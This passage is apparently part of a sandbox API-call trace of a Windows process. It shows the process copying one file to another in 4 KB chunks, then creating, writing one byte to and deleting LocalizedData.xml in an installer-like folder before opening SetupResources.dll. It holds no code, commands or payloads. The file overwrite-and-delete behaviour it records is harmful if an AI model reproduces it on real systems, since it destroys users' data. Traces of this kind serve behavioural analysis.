lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.279] GetLastError () returned 0x0 [0069.279] SetLastError (dwErrCode=0x0) [0069.279] GetLastError () returned 0x0 [0069.279] SetLastError (dwErrCode=0x0) [0069.279] GetLastError () returned 0x0 [0069.279] SetLastError (dwErrCode=0x0) [0069.279] GetLastError () returned 0x0 [0069.279] SetLastError (dwErrCode=0x0) [0069.279] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.279] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.279] GetLastError () returned 0x0 [0069.279] SetLastError (dwErrCode=0x0) [0069.280] GetLastError () returned 0x0 [0069.280] SetLastError (dwErrCode=0x0) [0069.280] GetLastError () returned 0x0 [0069.280] SetLastError (dwErrCode=0x0) [0069.280] GetLastError () returned 0x0 [0069.280] SetLastError (dwErrCode=0x0) [0069.280] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.280] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.293] GetLastError () returned 0x0 [0069.294] SetLastError (dwErrCode=0x0) [0069.294] GetLastError () returned 0x0 [0069.294] SetLastError (dwErrCode=0x0) [0069.294] GetLastError () returned 0x0 [0069.294] SetLastError (dwErrCode=0x0) [0069.296] GetLastError () returned 0x0 [0069.296] SetLastError (dwErrCode=0x0) [0069.297] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.297] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.300] GetLastError () returned 0x0 [0069.300] SetLastError (dwErrCode=0x0) [0069.301] GetLastError () returned 0x0 [0069.301] SetLastError (dwErrCode=0x0) [0069.301] GetLastError () returned 0x0 [0069.301] SetLastError (dwErrCode=0x0) [0069.301] GetLastError () returned 0x0 [0069.301] SetLastError (dwErrCode=0x0) [0069.301] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.301] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.301] GetLastError () returned 0x0 [0069.301] SetLastError (dwErrCode=0x0) [0069.301] GetLastError () returned 0x0 [0069.302] SetLastError (dwErrCode=0x0) [0069.302] GetLastError () returned 0x0 [0069.302] SetLastError (dwErrCode=0x0) [0069.302] GetLastError () returned 0x0 [0069.302] SetLastError (dwErrCode=0x0) [0069.302] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.302] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.317] GetLastError () returned 0x0 [0069.318] SetLastError (dwErrCode=0x0) [0069.318] GetLastError () returned 0x0 [0069.318] SetLastError (dwErrCode=0x0) [0069.318] GetLastError () returned 0x0 [0069.318] SetLastError (dwErrCode=0x0) [0069.318] GetLastError () returned 0x0 [0069.318] SetLastError (dwErrCode=0x0) [0069.318] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.318] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.318] GetLastError () returned 0x0 [0069.318] SetLastError (dwErrCode=0x0) [0069.319] GetLastError () returned 0x0 [0069.319] SetLastError (dwErrCode=0x0) [0069.319] GetLastError () returned 0x0 [0069.319] SetLastError (dwErrCode=0x0) [0069.319] GetLastError () returned 0x0 [0069.319] SetLastError (dwErrCode=0x0) [0069.319] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.319] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.319] GetLastError () returned 0x0 [0069.319] SetLastError (dwErrCode=0x0) [0069.319] GetLastError () returned 0x0 [0069.319] SetLastError (dwErrCode=0x0) [0069.320] GetLastError () returned 0x0 [0069.320] SetLastError (dwErrCode=0x0) [0069.320] GetLastError () returned 0x0 [0069.320] SetLastError (dwErrCode=0x0) [0069.320] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.320] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.320] GetLastError () returned 0x0 [0069.320] SetLastError (dwErrCode=0x0) [0069.320] GetLastError () returned 0x0 [0069.320] SetLastError (dwErrCode=0x0) [0069.320] GetLastError () returned 0x0 [0069.320] SetLastError (dwErrCode=0x0) [0069.321] GetLastError () returned 0x0 [0069.321] SetLastError (dwErrCode=0x0) [0069.321] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.321] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.321] GetLastError () returned 0x0 [0069.321] SetLastError (dwErrCode=0x0) [0069.321] GetLastError () returned 0x0 [0069.321] SetLastError (dwErrCode=0x0) [0069.321] GetLastError () returned 0x0 [0069.321] SetLastError (dwErrCode=0x0) [0069.321] GetLastError () returned 0x0 [0069.321] SetLastError (dwErrCode=0x0) [0069.322] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.322] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.322] GetLastError () returned 0x0 [0069.322] SetLastError (dwErrCode=0x0) [0069.322] GetLastError () returned 0x0 [0069.322] SetLastError (dwErrCode=0x0) [0069.322] GetLastError () returned 0x0 [0069.322] SetLastError (dwErrCode=0x0) [0069.322] GetLastError () returned 0x0 [0069.322] SetLastError (dwErrCode=0x0) [0069.322] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.323] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.323] GetLastError () returned 0x0 [0069.323] SetLastError (dwErrCode=0x0) [0069.323] GetLastError () returned 0x0 [0069.323] SetLastError (dwErrCode=0x0) [0069.323] GetLastError () returned 0x0 [0069.323] SetLastError (dwErrCode=0x0) [0069.323] GetLastError () returned 0x0 [0069.323] SetLastError (dwErrCode=0x0) [0069.323] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.323] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.324] GetLastError () returned 0x0 [0069.324] SetLastError (dwErrCode=0x0) [0069.324] GetLastError () returned 0x0 [0069.324] SetLastError (dwErrCode=0x0) [0069.324] GetLastError () returned 0x0 [0069.324] SetLastError (dwErrCode=0x0) [0069.324] GetLastError () returned 0x0 [0069.324] SetLastError (dwErrCode=0x0) [0069.324] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.324] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.325] GetLastError () returned 0x0 [0069.325] SetLastError (dwErrCode=0x0) [0069.325] GetLastError () returned 0x0 [0069.325] SetLastError (dwErrCode=0x0) [0069.325] GetLastError () returned 0x0 [0069.325] SetLastError (dwErrCode=0x0) [0069.325] GetLastError () returned 0x0 [0069.325] SetLastError (dwErrCode=0x0) [0069.325] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0069.325] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.325] GetLastError () returned 0x0 [0069.325] SetLastError (dwErrCode=0x0) [0069.326] GetLastError () returned 0x0 [0069.326] SetLastError (dwErrCode=0x0) [0069.326] GetLastError () returned 0x0 [0069.326] SetLastError (dwErrCode=0x0) [0069.326] GetLastError () returned 0x0 [0069.326] SetLastError (dwErrCode=0x0) [0069.326] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x5c0, lpOverlapped=0x0) returned 1 [0069.326] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0069.326] GetLastError () returned 0x0 [0069.326] SetLastError (dwErrCode=0x0) [0069.326] ReadFile (in: hFile=0x428, lpBuffer=0x8c430, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0069.327] GetLastError () returned 0x0 [0069.327] SetLastError (dwErrCode=0x0) [0069.327] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d780 | out: hHeap=0x20000) returned 1 [0069.327] WriteFile (in: hFile=0x410, lpBuffer=0x8d438*, nNumberOfBytesToWrite=0x5c0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8d438*, lpNumberOfBytesWritten=0x327ef70*=0x5c0, lpOverlapped=0x0) returned 1 [0069.327] GetLastError () returned 0x0 [0069.327] SetLastError (dwErrCode=0x0) [0069.411] GetLastError () returned 0x0 [0069.412] SetLastError (dwErrCode=0x0) [0069.413] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0069.414] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.415] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0069.416] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8d438 | out: hHeap=0x20000) returned 1 [0069.416] CloseHandle (hObject=0x410) returned 1 [0069.440] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0069.440] CloseHandle (hObject=0x428) returned 1 [0069.441] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0069.442] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0069.504] AreFileApisANSI () returned 1 [0069.504] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0069.504] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71688 [0069.505] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x71688, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 45 [0069.505] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.506] GetFileType (hFile=0x428) returned 0x1 [0069.506] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0069.506] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0069.506] GetLastError () returned 0xb7 [0069.506] SetLastError (dwErrCode=0xb7) [0069.506] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0069.507] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0069.507] CloseHandle (hObject=0x428) returned 1 [0069.508] AreFileApisANSI () returned 1 [0069.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0069.508] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0069.508] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e3b0, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml") returned 45 [0069.508] DeleteFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1044\\localizeddata.xml")) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5e570 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d6d8 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d798 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x84fb8 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0069.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.509] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.509] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4558, dwReserved0=0x1, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0069.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0069.509] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.509] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0069.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0069.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0069.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0069.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0069.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0069.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0069.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0069.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0069.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0069.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0069.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0069.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0069.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71960 [0069.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0069.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0069.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71bd0 [0069.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0069.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71bd0 | out: hHeap=0x20000) returned 1 [0069.510] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0069.510] AreFileApisANSI () returned 1 [0069.510] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0069.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0069.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.510] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.510] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0069.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0069.511] AreFileApisANSI () returned 1 [0069.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0069.511] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x716f0 [0069.511] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x716f0, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 46 [0069.511] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1044\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1044\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.511] GetFileType (hFile=0x428) returned 0x1 [0069.511] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x716f0 | out: hHeap=0x20000) returned 1 [0069.511] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0069.511] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0069.511] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0069.512] CloseHandle (hObject=0x428) returned 1 [0069.512] AreFileApisANSI () returned 1 [0069.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0069.512] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x719c8 [0069.512] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e340, cbMultiByte=-1, lpWideCharStr=0x719c8, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1044\\SetupResources.dll") returned 46 [0069.512] CreateFileW 